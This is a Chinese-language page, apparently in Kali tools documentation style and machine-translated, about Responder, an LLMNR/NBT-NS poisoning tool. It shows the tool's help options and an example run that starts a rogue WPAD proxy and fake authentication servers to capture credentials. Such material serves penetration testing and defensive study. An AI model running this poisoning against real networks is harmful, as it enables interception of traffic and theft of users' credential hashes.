响应包装说明

这个工具首先是一个LLMNR和NBT-NS响应,将根据其名称后缀回答*具体* NBT-NS(NetBIOS名称的服务)查询(见http://support.microsoft.com/kb/163409) 。默认情况下,该工具将只回答到文件服务器服务的要求,这对于中小型企业。这背后的概念,是针对我们的答案,并在网络上隐蔽。这也有助于确保我们不打破合法NBT-NS的行为。如果你想这个工具来回答工作站服务请求的后缀名可以设置通过命令行-r选项为1。

资料来源:https://github.com/SpiderLabs/Responder
应答器首页 | 卡利响应回购

  • 作者:Trustwave控股公司,洛朗Gaffie
  • 许可:GPLv3的

包括在响应包中的工具

响应 - NBT-NS / LLMNR响应
[email protected]:~# responder -h
Usage: python /usr/bin/responder -i 10.20.30.40 -b On -r On

Options:
  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests from which workstation to
                        which workstation without poisoning anything.
  -i 10.20.30.40, --ip=10.20.30.40
                        The ip address to redirect the traffic to. (usually
                        yours)
  -I eth0, --interface=eth0
                        Network interface to use
  -b Off, --basic=Off   Set this to On if you want to return a Basic HTTP
                        authentication. Off will return an NTLM
                        authentication.This option is mandatory.
  -r Off, --wredir=Off  Set this to enable answers for netbios wredir suffix
                        queries. Answering to wredir will likely break stuff
                        on the network (like classics 'nbns spoofer' will).
                        Default value is therefore set to Off
  -f Off, --fingerprint=Off
                        This option allows you to fingerprint a host that
                        issued an NBT-NS or LLMNR query.
  -w On, --wpad=On      Set this to On or Off to start/stop the WPAD rogue
                        proxy server. Default value is Off
  -F Off, --ForceWpadAuth=Off
                        Set this to On or Off to force NTLM/Basic
                        authentication on wpad.dat file retrieval. This might
                        cause a login prompt in some specific cases. Default
                        value is Off
  --lm=Off              Set this to On if you want to force LM hashing
                        downgrade for Windows XP/2003 and earlier. Default
                        value is Off
  -v                    More verbose

响应用法示例

指定IP地址重定向到(-i 192.168.1.202),使WPAD流氓代理(-w开),答案的NetBIOS wredir(-r),并且指纹(-f开):

[email protected]:~# responder -i 192.168.1.202 -w On -r On -f On
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface:ALL
Challenge set is:1122334455667788
WPAD Proxy Server is:ON
WPAD script loaded:function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:OFF
SQL Server is:ON
FTP Server is:ON
IMAP Server is:ON
POP3 Server is:ON
SMTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:ON
Serving Executable via HTTP&WPAD is:OFF
Always Serving a Specific File via HTTP&WPAD is:OFF